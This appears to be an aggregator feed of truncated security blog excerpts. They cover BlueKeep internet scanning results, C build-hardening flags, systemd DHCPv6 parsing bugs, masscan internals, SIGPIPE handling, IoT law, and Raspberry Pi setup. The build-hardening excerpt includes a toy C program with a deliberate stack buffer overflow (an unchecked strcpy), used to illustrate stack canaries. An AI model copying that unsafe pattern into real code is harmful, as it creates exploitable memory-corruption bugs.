ErrataRob.webp 2019-05-28 06:20:06 Almost One Million Vulnerable to BlueKeep Vuln (CVE-2019-0708) (lien direct) Microsoft announced a vulnerability in its "Remote Desktop" product that can lead to robust, wormable exploits. I scanned the Internet to assess the danger. I find nearly 1-million devices on the public Internet that are vulnerable to the bug. That means when the worm hits, it'll likely compromise those million devices. This will likely lead to an event as damaging as WannaCry and notPetya from 2017 -- potentially worse, as hackers have since honed their skills exploiting these things for ransomware and other nastiness. To scan the Internet, I started with masscan, my Internet-scale port scanner, looking for port 3389, the one used by Remote Desktop. This takes a couple of hours, and lists all the devices running Remote Desktop -- in theory. This returned 7,629,102 results (over 7-million). However, there is a lot of junk out there that'll respond on this port. Only about half are actually Remote Desktop. Masscan only finds the open ports, but is not complex enough to check for the vulnerability. Remote Desktop is a complicated protocol. A project was posted that could connect to an address and test it, to see if it was patched or vulnerable. I took that project and optimized it a bit, rdpscan, then used it to scan the results from masscan. It's a thousand times slower, but it's only scanning the results from masscan instead of the entire Internet. The table of results is as follows:
1447579  UNKNOWN - receive timeout
1414793  SAFE - Target appears patched
1294719  UNKNOWN - connection reset by peer
1235448  SAFE - CredSSP/NLA required
 923671  VULNERABLE -- got appid
 651545  UNKNOWN - FIN received
 438480  UNKNOWN - connect timeout
 105721  UNKNOWN - connect failed 9
  82836  SAFE - not RDP but HTTP
  24833  UNKNOWN - connection reset on connect
   3098  UNKNOWN - network error
   2576  UNKNOWN - connection terminated
The various UNKNOWN results fail for various reasons. A lot of them are because the protocol isn't actually Remote Desktop, and responds weirdly when we try to talk Remote Desktop. A lot of others are Windows machines, sometimes vulnerable and sometimes not, that for some reason return errors sometimes. The important results are those marked VULNERABLE. There are 923,671 vulnerable machines in this result. That means we've confirmed the vulnerability really does exist, though it's possible a small number of these are "honeypots" deliberately pretending to be vulnerable in order to monitor hacker activity on the Internet. The next results are those marked SAFE due to probably being patched. Actually, it doesn't necessarily mean they are patched Windows boxes. They could instead be non-Windows systems that appear the same as patched Windows boxes. But either way, they are safe from this vulnerability. There are 1,414,793 of them. The next results to look at are those marked SAFE due to CredSSP/NLA failures, of which there are 1,235,448. This doesn't mean they are patched, only that we can't exploit them. They require "network level authentication" before we can talk Remote Desktop to them. That means we can't test whether they are patched or vulnerable -- but neither can the hackers. They may still be exploitable via an insider threat who knows a valid username/password, but they aren't exploitable by anonymous hackers or worms. The next category is marked as SAFE because they aren't Remote Desktop at all, but HTTP servers.
In other words, in response to o Ransomware Vulnerability Threat Patching Guideline NotPetya Wannacry
ErrataRob.webp 2019-05-27 19:59:38 A lesson in journalism vs. cybersecurity (lien direct) A recent NYTimes article blaming the NSA for a ransomware attack on Baltimore is typical bad journalism. It's an op-ed masquerading as a news article. It cites many sources to support the conclusion that the NSA is to blame, but only a single quote, from the NSA director, for the opposing side. Yet many experts oppose this conclusion, such as @dave_maynor, @beauwoods, @daveaitel, @riskybusiness, @shpantzer, @todb, @hrbrmst, ... It's not as if these people are hard to find; it's that the story's authors didn't look. The main reason experts disagree is that the NSA's EternalBlue isn't actually responsible for most ransomware infections. It's almost never used to start the initial infection -- that's almost always phishing or website vulns. Once inside, it's almost never used to spread laterally -- that's almost always done with Windows networking and stolen credentials. Yes, ransomware increasingly includes EternalBlue as part of its arsenal of attacks, but this doesn't mean EternalBlue is responsible for ransomware. The NYTimes story takes extraordinary effort to jump around this fact, deliberately misleading the reader to conflate one with the other. A good example is this paragraph: [quoted paragraph not reproduced in this excerpt] That link is a warning from last July about the "Emotet" ransomware and makes no mention of EternalBlue. Instead, the story is citing anonymous researchers claiming that EternalBlue has been added to Emotet since that DHS warning. Who are these anonymous researchers? The NYTimes article doesn't say. This is bad journalism. The principles of journalism say you are supposed to attribute where you got such information, so that the reader can verify for themselves whether the information is true or false, or at least, credible. And in this case, it's probably false. The likely source for that claim is this article from Malwarebytes about Emotet. They have since retracted this claim, as the latest version of their article points out. In any event, the NYTimes article claims that Emotet is now "relying" on the NSA's EternalBlue to spread. That's not the same thing as "using", not even close. Yes, lots of ransomware has been updated to also use EternalBlue to spread. However, what ransomware is relying upon is still the Wind Ransomware Malware Patching Guideline NotPetya Wannacry
ErrataRob.webp 2019-04-23 00:18:02 Programming languages infosec professionals should learn (lien direct) Coding is an essential skill of the infosec professional, but there are so many languages to choose from. What language should you learn? As a heavy coder, I thought I'd answer that question, or at least give some perspective. The tl;dr is JavaScript. Whatever other language you learn, you'll also need to learn JavaScript. It's the language of browsers, Word macros, JSON, NodeJS server side, scripting on the command-line, and Electron apps. You'll also need a bit of bash and/or PowerShell scripting, SQL for database queries, and regex for extracting data from text files. Other languages are important as well; Python is very popular, for example. Actively avoid C++ and PHP as they are obsolete. Also tl;dr: whatever language you decide to learn, also learn how to use an IDE with visual debugging, rather than just a text editor. That probably means Visual Studio Code from Microsoft. Also, whatever language you learn, stash your code on GitHub. Let's talk in general terms. Here are some types of languages.
Unavoidable. As mentioned above, familiarity with JavaScript, bash/PowerShell, and SQL is unavoidable. If you are avoiding them, you are doing something wrong.
Small scripts. You need to learn at least one language for writing quick-and-dirty command-line scripts to automate tasks or process data. As a tool-using animal, this is your basic tool. You are a monkey; this is the stick you use to knock down the banana. Good choices are JavaScript, Python, and Ruby. Some domain-specific languages can also work, like PHP and Lua. Those skilled in bash/PowerShell can do a surprising number of "programming" tasks in those languages. Old timers use things like PERL or TCL. Sometimes the choice of which language to learn depends upon the vast libraries that come with the languages, especially Python and JavaScript libraries.
Development languages. Those scripting languages have grown up into real programming languages, but for the most part, "software development" means languages designed for that task, like C, C++, Java, C#, Rust, Go, or Swift.
Domain-specific languages. The language Lua is built into nmap, snort, Wireshark, and many games. Ruby is the language of Metasploit. Further afield, you may end up learning languages like R or Matlab. PHP is incredibly important for web development. Mobile apps may need Java, C#, Kotlin, Swift, or Objective-C.
As an experienced developer, here are my comments on the various languages, sorted in alphabetic order.
bash (and other Unix shells)
You have to learn some bash for dealing with the command-line. But it's also a fairly complete programming language. Peruse the scripts in an average Linux distribution, especially some of the older ones, and you'll find that bash makes up a substantial amount of what we think of as the Linux operating system. Actually, it's called bash/Linux. In the Unix world, there are lots of other related shells that aren't bash, which have slightly different syntax. A good example is BusyBox, which has "ash". I mention this because my bash skills are rather poor, partly because I originally learned "csh" and get my syntax variants confused. As a hard-core developer, I end up just programming in JavaScript or even C rather than trying to create complex bash scripts. But you shouldn't look down on complex bash scripts, because they can do great things.
In particular, if you are a pentester, the shell is often the only language you'll get when hacking into a system, so good bash skills are a must.
C
This is the development language I use the most, simply because I'm an old-time "systems" developer. What "systems programming" means i Guideline
ErrataRob.webp 2018-12-15 22:40:22 Notes on Build Hardening (lien direct) I thought I'd comment on a paper about "build safety" in consumer products, describing how software is built to harden it against hackers trying to exploit bugs.
What is build safety?
Modern languages (Java, C#, Go, Rust, JavaScript, Python, etc.) are inherently "safe", meaning they don't have "buffer-overflows" or related problems. However, C/C++ is "unsafe", and is the most popular language for building stuff that interacts with the network. In other cases, while the language itself may be safe, it'll use underlying infrastructure ("libraries") written in C/C++. When we are talking about hardening builds, making them safe or secure, we are talking about C/C++. In the last two decades, we've improved both hardware and operating systems around C/C++ in order to impose safety on it from the outside. We do this with options when the software is built (compiled and linked), and then when the software is run. That's what the paper above looks at: how consumer devices are built using these options, and thereby measures the security of these devices. In particular, we are talking about the Linux operating system here and the GNU compiler gcc. Consumer products almost always use Linux these days, though a few also use embedded Windows or QNX. They are almost always built using gcc, though some are built using a clone known as clang (or llvm).
How software is built
Software is first compiled, then linked. Compiling means translating the human-readable source code into machine code. Linking means combining multiple compiled files into a single executable. Consider a program hello.c. We might compile it using the following command:
gcc -o hello hello.c
This command takes the file hello.c, compiles it, then outputs (-o) an executable with the name hello. We can set additional compilation options on the command-line here. For example, to enable stack guards, we'd compile with a command that looks like the following:
gcc -o hello -fstack-protector hello.c
In the following sections, we are going to look at specific options and what they do.
Stack guards
A running program has various kinds of memory, optimized for different use cases. One chunk of memory is known as the stack. This is the scratch pad for functions. When a function in the code is called, the stack grows with the additional scratchpad needs of that function, then shrinks back when the function exits. As functions call other functions, which call other functions, the stack keeps growing larger and larger. When they return, it then shrinks back again. The scratch pad for each function is known as the stack frame. Among the things stored in the stack frame is the return address, where the function was called from, so that when it exits, the caller of the function can continue executing where it left off. The way stack guards work is to stick a carefully constructed value in between each stack frame, known as a canary. Right before the function exits, it'll check this canary in order to validate it hasn't been corrupted. If corruption is detected, the program exits, or crashes, to prevent worse things from happening. This solves the most commonly exploited vulnerability in C/C++ code, the stack buffer-overflow. This is the bug described in that famous paper Smashing the Stack for Fun and Profit Guideline
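To make the canary concrete, here is a toy program of mine (not from the paper) containing the classic stack buffer-overflow that -fstack-protector is designed to catch:
#include <stdio.h>
#include <string.h>

static void copy_name(const char *input)
{
    char name[16];          /* fixed-size buffer in this stack frame */
    strcpy(name, input);    /* no bounds check: a long input overflows */
    printf("hello %s\n", name);
}

int main(int argc, char *argv[])
{
    if (argc > 1)
        copy_name(argv[1]);
    return 0;
}
Compiled plainly and run with a long argument, it silently corrupts the stack frame, including the saved return address. Compiled with gcc -fstack-protector and run the same way, the overwritten canary is detected when copy_name() returns, and the program aborts with a "stack smashing detected" message rather than letting the corruption be exploited.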
ErrataRob.webp 2018-11-04 18:22:46 Brian Kemp is bad on cybersecurity (lien direct) I'd prefer a Republican governor, but as a cybersecurity expert, I have to point out how bad Brian Kemp (candidate for Georgia governor) is on cybersecurity. When notified about vulnerabilities in election systems, his response has been to shoot the messenger rather than fix the vulnerabilities. This was the premise behind the cybercrime bill earlier this year that was ultimately vetoed by the current governor after vocal opposition from cybersecurity companies. More recently, he announced that he's investigating the Georgia State Democratic Party for a "failed hacking attempt". According to news stories, state elections websites are full of common vulnerabilities, those documented by the OWASP Top 10, such as "direct object references" that would allow any election registration information to be read or changed, allowing, for example, a hacker to cancel the registrations of voters of the other party. Testing for such weaknesses is not a crime. Indeed, it's desirable that people can test for security weaknesses. Systems that aren't open to testing are insecure. This concept is the basis for many policy initiatives at the federal level, not only to protect researchers probing for weaknesses from prosecution, but even to provide bounties encouraging them to do so. The DoD has a "Hack the Pentagon" initiative encouraging exactly this. But the State of Georgia is stereotypically backwards and thuggish. Earlier this year, the legislature passed SB 315, which criminalized the activity of merely attempting to access a computer without permission, to probe for possible vulnerabilities. To the ignorant and backwards person, this seems reasonable: of course this bad activity should be outlawed. But as we in the cybersecurity community have learned over the last decades, this only stops your friends from finding security vulnerabilities, and does nothing to discourage your enemies. Russian election-meddling hackers are not deterred by such laws; only Georgia residents concerned about whether their government websites are secure are. It's your own users, and well-meaning security researchers, who are the primary source for improving security. Unless you live under a rock (like Brian Kemp, apparently), you'll have noticed that every month your Windows desktop or iPhone nags you about updating the software to fix security issues. If you look behind the scenes, you'll find that most of these security fixes come from outsiders. They come from technical experts who accidentally come across vulnerabilities. They come from security researchers who specifically look for vulnerabilities. It's because of this "research" that systems are mostly secure today. A few days ago was the 30th anniversary of the "Morris Worm" that took down the nascent Internet in 1988. The net of that time was hostile to security research, with major companies ignoring vulnerabilities. Systems then were laughably insecure, but vendors tried to address the problem by suppressing research. The Morris Worm exploited several vulnerabilities that were well-known at the time, but ignored by the vendor (in this case, primarily Sun Microsystems). Since then, with a culture of outsiders disclosing vulnerabilities, vendors have been pressured into fixing them. This has led to vast improvements in security. I'm posting this from a public WiFi hotspot in a bar, for example, because computers are secure enough for this to be safe.
10 years ago, such activity wasn't safe. The Georgia Democrats obviously have concerns about the integrity of election systems. They have every reason to thoroughly probe an elections website looking for vulnerabilities. This sort of activity should be encouraged, not supp Vulnerability Threat Guideline
ErrataRob.webp 2018-10-27 07:28:06 Systemd is bad parsing and should feel bad (lien direct) Systemd has a remotely exploitable bug in its DHCPv6 client. That means anybody on the local network can send you a packet and take control of your computer. The flaw is a typical buffer-overflow. Several news stories have pointed out that this client was written from scratch, as if that were the moral failing, instead of reusing existing code. That's not the problem. The problem is that it was written from scratch without taking advantage of the lessons of the past. It makes the same mistakes all over again. In the late 1990s and early 2000s, we learned that parsing input is a problem. The traditional ad hoc approach you were taught in school is wrong. It's wrong from an abstract theoretical point of view. It's wrong from the practical point of view, error prone and leading to spaghetti code. The first thing you need to unlearn is byte-swapping. I know that this was some sort of epiphany you had when you learned network programming, but byte-swapping is wrong. If you find yourself using a macro to swap bytes, like the be16toh() macro used in this code, then you are doing it wrong. But, you say, the network byte-order is big-endian, while today's Intel and ARM processors are little-endian. So you have to swap bytes, don't you? No. As proof of the matter I point to every language other than C/C++. They don't swap bytes. Their internal integer format is undefined. Indeed, something like JavaScript may be storing numbers as floating point. You can't muck around with the internal format of their integers even if you wanted to. An example of byte swapping in the code is something like this: [screenshot of the systemd code, not reproduced in this excerpt] In this code, it's taking a buffer of raw bytes from the DHCPv6 packet and "casting" it as a C internal structure. The packet contains a two-byte big-endian length field, "option->len", which the code must byte-swap in order to use. Among the errors here is casting an internal structure over external data. From an abstract theory point of view, this is wrong. Internal structures are undefined. Just because you can sort of know the definition in C/C++ doesn't change the fact that they are still undefined. From a practical point of view, this leads to confusion, as the programmer is never quite clear as to the boundary between external and internal data. You are supposed to rigorously verify external data, because the hacker controls it. You don't keep double-checking and second-guessing internal data, because that would be stupid. When you blur the lines between internal and external data, your checks get muddled up. Yes, you can, in C/C++, cast an internal structure over external data. But just because you can doesn't mean you should. What you should do instead is parse data the same way as if you were writing code in JavaScript. For example, to grab the DHCP6 option length field, you should write something like: Guideline
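The code image isn't reproduced in this excerpt, but the style the post advocates presumably looks something like the following sketch, which treats the packet purely as a buffer of untrusted bytes (the function name is mine; the 2-byte code and 2-byte length correspond to the standard DHCPv6 option header):
#include <stddef.h>

/* Parse a DHCPv6-style option header from raw external bytes.
 * No struct casting and no byte-swapping macros: the big-endian
 * integers are computed arithmetically, and the length is checked
 * against what was actually received. Returns 0 on success. */
static int parse_option(const unsigned char *buf, size_t buflen,
                        unsigned *code, unsigned *optlen)
{
    if (buflen < 4)
        return -1;                      /* too short for a header */
    *code   = buf[0] << 8 | buf[1];     /* same result on any CPU */
    *optlen = buf[2] << 8 | buf[3];
    if (*optlen > buflen - 4)
        return -1;                      /* length exceeds the packet */
    return 0;
}
Written this way, the same source is correct on big-endian and little-endian machines alike, and the bounds check happens at the one place where external data enters the program.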
ErrataRob.webp 2018-10-23 20:03:42 Masscan as a lesson in TCP/IP (lien direct) When learning TCP/IP it may be helpful to look at the masscan port scanning program, because it contains its own network stack. This concept, "contains its own network stack", is so unusual that it'll help resolve some confusion you might have about networking. It'll help challenge some (incorrect) assumptions you may have developed about how networks work. For example, here is a screenshot of running masscan to scan a single target from my laptop computer. My machine has an IP address of 10.255.28.209, but masscan runs with an address of 10.255.28.250. This works fine, with the program contacting the target computer and downloading information -- even though it has the "wrong" IP address. That's because it isn't using the network stack of the notebook computer, and hence is not using the notebook's IP address. Instead, it has its own network stack and its own IP address. At this point, it might be useful to describe what masscan is doing here. It's a "port scanner", a tool that connects to many computers and many ports to figure out which ones are open. In some cases, it can probe further: once it connects to a port, it can grab banners and version information. In the above example, the parameters to masscan used here are:
-p80 : probe for port "80", which is the well-known port assigned for web-services using the HTTP protocol
--banners : do a "banner check", grabbing simple information from the target depending on the protocol. In this case, it grabs the "title" field from the HTML from the server, and also grabs the HTTP headers. It does different banners for other protocols.
--source-ip 10.255.28.250 : this configures the IP address that masscan will use
172.217.197.113 : the target to be scanned. This happens to be a Google server, by the way, though that's not really important.
Now let's change the IP address that masscan is using to something completely different, like 1.2.3.4. The difference from the above screenshot is that we no longer get any data in response. Why is that? Guideline
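To illustrate what having your own network stack means in practice, here is a hedged sketch (my code, not masscan's) of how a user-mode stack might build an IPv4 header byte-by-byte. The source address is simply whatever you write into bytes 12-15 of the header, which is why masscan can use any --source-ip you give it:
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* RFC 1071 Internet checksum over a byte buffer. */
static uint16_t checksum(const uint8_t *p, size_t len)
{
    uint32_t sum = 0;
    for (; len > 1; p += 2, len -= 2)
        sum += (uint32_t)p[0] << 8 | p[1];
    if (len)
        sum += (uint32_t)p[0] << 8;
    while (sum >> 16)
        sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Fill in a minimal 20-byte IPv4 header carrying TCP. */
static void build_ipv4(uint8_t h[20], uint32_t src, uint32_t dst,
                       uint16_t payload_len)
{
    uint16_t total = 20 + payload_len, sum;
    memset(h, 0, 20);
    h[0] = 0x45;                        /* version 4, 5-word header */
    h[2] = total >> 8;  h[3] = total & 0xff;
    h[8] = 64;                          /* TTL */
    h[9] = 6;                           /* protocol = TCP */
    h[12] = src >> 24;          h[13] = (src >> 16) & 0xff;  /* source IP: */
    h[14] = (src >> 8) & 0xff;  h[15] = src & 0xff;          /* any value  */
    h[16] = dst >> 24;          h[17] = (dst >> 16) & 0xff;
    h[18] = (dst >> 8) & 0xff;  h[19] = dst & 0xff;
    sum = checksum(h, 20);
    h[10] = sum >> 8;   h[11] = sum & 0xff;
}
The kernel's normal socket API would never let an ordinary program pick its own source address like this; a program transmitting raw frames can. It also suggests why 1.2.3.4 fails: presumably the target's replies are routed toward 1.2.3.4 rather than back to the scanner's network, so masscan never sees them.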
ErrataRob.webp 2018-10-21 18:10:54 TCP/IP, Sockets, and SIGPIPE (lien direct) There is a spectre haunting the Internet -- the spectre of SIGPIPE errors. It's a bug in the original design of Unix networking from 1981 that is perpetuated by college textbooks, which teach students to ignore it. As a consequence, software sometimes unexpectedly crashes. This is particularly acute on industrial and medical networks, where security professionals can't run port/security scans for fear of crashing critical devices. An example of why this bug persists is the well-known college textbook "Unix Network Programming" by Richard Stevens. In section 5.13, he correctly describes the problem:
When a process writes to a socket that has received an RST, the SIGPIPE signal is sent to the process. The default action of this signal is to terminate the process, so the process must catch the signal to avoid being involuntarily terminated.
This description is accurate. The "Sockets" network API was based on "pipes" interprocess communication when TCP/IP was first added to the Unix operating system back in 1981. This made it straightforward and comprehensible to the programmers at the time. This SIGPIPE behavior made sense when piping the output of one program to another program on the command-line, as is typical under Unix: if the receiver of the data crashes, then you want the sender of the data to also stop running. But it's not the behavior you want for networking. Server processes need to continue running even if a client crashes. But Stevens's description is insufficient. It portrays the problem as optional, one that only exists if the other side of the connection is misbehaving. He never mentions the problem outside this section, and none of his example code handles it. Thus, if you base your code on Stevens's, it'll inherit this problem and sometimes crash. The simplest solution is to configure the program to ignore the signal, such as by putting the following line of code in your main() function:
signal(SIGPIPE, SIG_IGN);
If you search popular projects, you'll find this solution there most of the time, such as in openssl. But there is a problem with this approach, as OpenSSL demonstrates: it's both a command-line program and a library. The command-line program handles this error, but the library doesn't. This means that using the SSL_write() function to send encrypted data may encounter this error. Nowhere does the OpenSSL documentation mention that the user of the library needs to handle this. Ideally, library writers would like to deal with the problem internally. There are platform-specific ways to do this. On Linux, an additional parameter, MSG_NOSIGNAL, can be added to the send() function. On BSD (including macOS), setsockopt(SO_NOSIGPIPE) can be configured for the socket when it's created (after socket() or after accept()). On Windows and some other operating systems, SIGPIPE isn't even generated, so nothing needs to be done for those platforms. But it's difficult. Browsing through cross-platform projects like curl, which tries this library technique, I see the following bit:
#ifdef __SYMBIAN32__
/* This isn't actually supported under Symbian OS */
#undef SO_NOSIGPIPE
Guideline
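A library-internal workaround covering those platform differences might look like this sketch (mine, not curl's or OpenSSL's actual code):
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>

/* Send without generating SIGPIPE, using whichever mechanism the
 * platform offers: a per-call flag on Linux, a per-socket option on
 * BSD/macOS, or (worst case) ignoring the signal process-wide. */
static ssize_t send_nosigpipe(int fd, const void *buf, size_t len)
{
#if defined(MSG_NOSIGNAL)
    return send(fd, buf, len, MSG_NOSIGNAL);
#elif defined(SO_NOSIGPIPE)
    int on = 1;
    setsockopt(fd, SOL_SOCKET, SO_NOSIGPIPE, &on, sizeof(on));
    return send(fd, buf, len, 0);
#else
    signal(SIGPIPE, SIG_IGN);   /* process-wide: affects the whole app */
    return send(fd, buf, len, 0);
#endif
}
Ideally the SO_NOSIGPIPE option would be set once, right after socket() or accept(), rather than on every send; the #ifdef ladder is the real point. There is no fully portable way for a library to suppress the signal quietly, which is why the problem keeps leaking through to applications.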
ErrataRob.webp 2018-10-19 19:24:46 Election interference from Uber and Lyft (lien direct) Almost nothing can escape the taint of election interference. A good example is the announcements by Uber and Lyft that they'll provide free rides to the polls on election day. This well-meaning gesture nonetheless calls into question how it might influence the election. "Free rides" to the polls are a common thing. Taxi companies have long offered such services for people in general. Political groups have long offered such services for their constituencies in particular. Political groups target retirement communities to get them to the polls, and black churches have long had their "Souls to the Polls" program across the 37 states that allow early voting on Sundays. But with Uber and Lyft getting into this, we now have concerns about "big data", "algorithms", and "hacking". As the various Facebook controversies have taught us, these companies have a lot of data on us that can reliably predict how we are going to vote. If their leaders wanted to, these companies could use this information to get those on one side of an issue to the polls. In hotly contested elections, it wouldn't take much to swing the result to one side. Even if they don't do this consciously, their various algorithms (often based on machine learning and AI) may do so accidentally. As is frequently demonstrated, unconscious biases can lead to real-world consequences, like facial recognition systems being unable to read Asian faces. Lastly, it makes these companies prime targets for Russian hackers, who may take all of this into account when trying to muck with elections. Or indeed, to simply claim that they did, in order to call the results into question. Though to be fair, Russian hackers have so many other targets of opportunity. Messing with the traffic lights of a few cities would be enough to swing a presidential election, specifically targeting areas with certain voters, with traffic jams making it difficult for them to get to the polls. Even if it's not "hackers" as such, many will want to game the system. For example, politically motivated drivers may choose to loiter in neighborhoods strongly on one side or the other, helping the right sorts of people vote at the expense of not helping the wrong people. Likewise, drivers might skew the numbers by deliberately hailing rides out of opposing neighborhoods and taking them out of town, or to the right sorts of neighborhoods. I'm trying to figure out which Party this benefits the most. Let's take a look at rider demographics to start with, such as this post. It appears that income levels and gender are roughly evenly distributed. Ridership is skewed urban, with riders being 46% urban, 48% suburban, and 6% rural. In contrast, the US population is 31% urban, 55% suburban, and 15% rural. Given the increasing polarization between rural and urban voters, this strongly skews results in favor of Democrats. Likewise, the above numbers show that Uber ridership is strongly skewed to the younger generation, with 55% of riders 34 and younger. This again strongly skews "free rides" by Uber and Lyft toward the Democrats. Though to be fair, the "over 65" crowd has long had an advantage, as the parties have fallen over themselves to bus people from retirement communities to the polls (and older people can get free time on weekdays to vote). Even if you are on the side that appears to benefit, this should still concern you. Our allegiance should first be to a robust and fa Guideline Uber
ErrataRob.webp 2018-10-14 04:57:46 How to irregular cyber warfare (lien direct) Somebody (@thegrugq) pointed me to this article on "Lessons on Irregular Cyber Warfare", citing the masters like Sun Tzu, von Clausewitz, Mao, Che, and the usual characters. It tries to answer: "...as an insurgent, which is in a weaker power position vis-a-vis a stronger nation state; how does cyber warfare plays an integral part in the irregular cyber conflicts in the twenty-first century between nation-states and violent non-state actors or insurgencies". I thought I'd write a rebuttal. None of these people provide any value. If you want to figure out cyber insurgency, then you want to focus on the technical "cyber" aspects, not "insurgency". I regularly read military articles about cyber written by people who, like the author of the above article, demonstrate little experience in cyber. The chief technical lesson for the cyber insurgent is the Birthday Paradox. Let's say, hypothetically, you go to a party with 23 people total. What's the chance that any two people at the party have the same birthday? The answer is 50.7%. With a party of 75 people, the chance rises to 99.9% that two will have the same birthday. The paradox is that your intuitive way of calculating the odds is wrong. You are thinking the odds are like those of somebody having the same birthday as yourself, which is indeed roughly 23 out of 365. But we aren't talking about you vs. the remainder of the party; we are talking about any possible combination of two people. This dramatically changes how we do the math (a short program that does the math appears at the end of this post). In cryptography, this is known as the "Birthday Attack". One crypto task is to uniquely fingerprint documents. Historically, the most popular way of doing this was with an algorithm known as "MD5", which produces 128-bit fingerprints. Given a document with an MD5 fingerprint, it's impossible to create a second document with the same fingerprint. However, with MD5, it's possible to create two documents with the same fingerprint. In other words, we can't modify only one document to get a match, but we can keep modifying two documents until their fingerprints match. Like the party: finding somebody with your birthday is hard; finding any two people with the same birthday is easier. The same principle works with insurgencies. Accomplishing one specific goal is hard, but accomplishing any goal is easy. Trying to do a narrowly defined task to disrupt the enemy is hard, but it's easy to support a group of motivated hackers and let them do any sort of disruption they can come up with. The above article suggests a means of using cyber to disrupt a carrier attack group. This is an example of something hard, a narrowly defined attack that is unlikely to actually work in the real world. Conversely, consider the attacks attributed to North Korea, like those against Sony or the Wannacry virus. These aren't the carefully planned operations of a small state actor trying to accomplish specific goals. These are the actions of an actor that supports hacker groups and lets them loose without a lot of oversight and direction. Wannacry in particular is an example of an undirected cyber attack. We know from our experience with network worms that its effects were impossible to predict. Somebody just stuck the newly discovered NSA EternalBlue payload into an existing virus framework and let it run to see what happened. As we worm experts know, nobody could have predicted the results of doing so, not even its creators. Another example is the DNC election hacks.
The reason we can attribute them to Russia is that it wasn't their narrow goal. Instead, by looking at things like their URL shortener, we can see that they flailed around broadly all over cyberspace. The DNC was just one of thei Hack Guideline Wannacry
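To check the birthday numbers quoted in this post, a short program (mine, not from the article):
#include <stdio.h>

/* Chance that some pair among n people shares a birthday:
 * 1 minus the probability that all n birthdays are distinct. */
int main(void)
{
    int sizes[] = {23, 75};
    for (int i = 0; i < 2; i++) {
        int n = sizes[i];
        double none = 1.0;
        for (int k = 0; k < n; k++)
            none *= (365.0 - k) / 365.0;
        printf("n = %d: %.2f%%\n", n, 100.0 * (1.0 - none));
    }
    return 0;
}
It prints 50.73% for 23 people and 99.97% for 75, matching the 50.7% and 99.9% figures above.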
ErrataRob.webp 2018-09-10 17:33:17 California's bad IoT law (lien direct) California has passed an IoT security bill, awaiting the governor's signature/veto. It's a typically bad bill based on a superficial understanding of cybersecurity/hacking that will do little to improve security, while doing a lot to impose costs and harm innovation. It's based on the misconception of adding security features. It's like dieting, where people insist you should eat more kale, which does little to address the problem that you are pigging out on potato chips. The key to dieting is not eating more but eating less. The same is true of cybersecurity, where the point is not to add "security features" but to remove "insecure features". For IoT devices, that means removing listening ports and cross-site/injection issues in web management. Adding features is typical "magic pill" or "silver bullet" thinking that we spend much of our time in infosec fighting against. We don't want arbitrary features like firewalls and anti-virus added to these products. It'll just increase the attack surface, making things worse. The one possible exception to this is "patchability": some IoT devices can't be patched, and that is a problem. But even here, it's complicated. Even if IoT devices are patchable in theory, there is no guarantee vendors will supply such patches, or worse, that users will apply them. Users overwhelmingly forget about devices once they are installed. These devices aren't like phones/laptops, which notify users about patching. You might think a good solution to this is automated patching, but only if you ignore history. Many rate "NotPetya" as the worst, most costly cyberattack ever. That was launched by subverting an automated patch. Most IoT devices exist behind firewalls, and are thus very difficult to hack. Automated patching gets beyond firewalls; it makes it much more likely mass infections will result from hackers targeting the vendor. The Mirai worm infected fewer than 200,000 devices. A hack of a tiny IoT vendor can gain control of more devices than that in one fell swoop. The bill does target one insecure feature that should be removed: hardcoded passwords. But it gets the language wrong. A device doesn't have a single password, but many things that may or may not be called passwords. A typical IoT device has one system for creating accounts on the web management interface, a wholly separate authentication system for services like Telnet (based on /etc/passwd), and yet another wholly separate system for things like debugging interfaces. Just because a device does the prescribed thing of using a unique or user-generated password in the user interface doesn't mean it doesn't also have a bug in Telnet. That was the problem with devices infected by Mirai. The description that these were hardcoded passwords is only a superficial understanding of the problem. The real problem was that there were different authentication systems in the web interface and in other services like Telnet. Most of the devices vulnerable to Mirai did the right thing on the web interfaces (meeting the language of this law), requiring the user to create new passwords before operating. They just did the wrong thing elsewhere. People aren't really paying attention to what happened with Mirai. They look at the 20 billion new IoT devices that are going to be connected to the Internet by 2020 and believe Mirai is just the tip of the iceberg. But it isn't. The IPv4 Internet has only 4 billion addresses, which are pretty much already used up.
This means those 20 billion won't be exposed to the public Internet like Mirai devices, but hidden behind firewalls that translate addresses. Thus, rather than Mirai presaging the future, it represents the last gasp of the past that is unlikely to come again.

This law is backward-looking rather than forward-looking. Forward looking, by far the most important t Hack Threat Patching Guideline NotPetya Tesla
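As a concrete illustration of the point above about removing listening ports rather than adding features, a minimal sketch of how one might check whether a device exposes services beyond its web management interface. This is an illustrative example, not from the original post: the device address is a placeholder, and nmap must be installed.

# Probe a hypothetical IoT device (192.168.1.50 is a placeholder address)
# for common extra services: SSH (22), Telnet (23), and web interfaces.
# A Telnet listener with its own /etc/passwd-based login is exactly the
# kind of separate, forgotten authentication system described above.
nmap -p 22,23,80,443,8080 192.168.1.50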
ErrataRob.webp 2018-08-27 01:56:09 Provisioning a headless Raspberry Pi (lien direct) The typical way of installing a fresh Raspberry Pi is to attach power, keyboard, mouse, and an HDMI monitor. This is a pain, especially for the diminutive RPi Zero. This blogpost describes a number of options for doing headless setup: Ethernet, Ethernet gadget, WiFi, and serial connection. These examples use a Macbook; maybe I'll get around to a blogpost describing this from Windows.

Burning the micro SD card

We are going to edit the SD card before booting, so for completeness, I thought I'd describe the process of burning an SD card.

We are going to download the latest "raspbian" operating system. I download the "lite" version because I'm not using the desktop features. It comes as a compressed .zip file which we need to extract into an .img file. Just double-click on the .zip on Windows or Mac.

The next step is to burn the image to an SD card. On Windows I use Win32DiskImager. On Mac I use the following command-line steps:

$ sudo -s
# mount
# diskutil unmount /dev/disk2s1
# dd bs=1m if=~/Downloads/2018-06-27-raspbian-stretch-lite.img of=/dev/disk2 conv=sync

First, I need a root prompt. I then use the mount command to find out where the micro SD card is mounted in the file system. It's usually /dev/disk2s1, but could be disk3 or disk4 depending upon other things that may already be mounted on my Mac, such as USB drives or dmg files. It's important to know the correct drive because the dd utility is unforgiving of mistakes and can wipe out your entire drive. For gosh's sake, don't use disk1!!!! Remember, dd stands for danger-danger (well, many claim it stands for disk-dump, but seriously, it's dangerous).

The next step is to unmount the drive. Instead of the Unix umount utility, use the macOS diskutil unmount tool.

Now we use good ol' dd to copy the image over. The above example uses my recently downloaded Raspbian image, which is two months old. When you do this, it'll be a newer version with a different file name, so look in your ~/Downloads folder for the correct name.

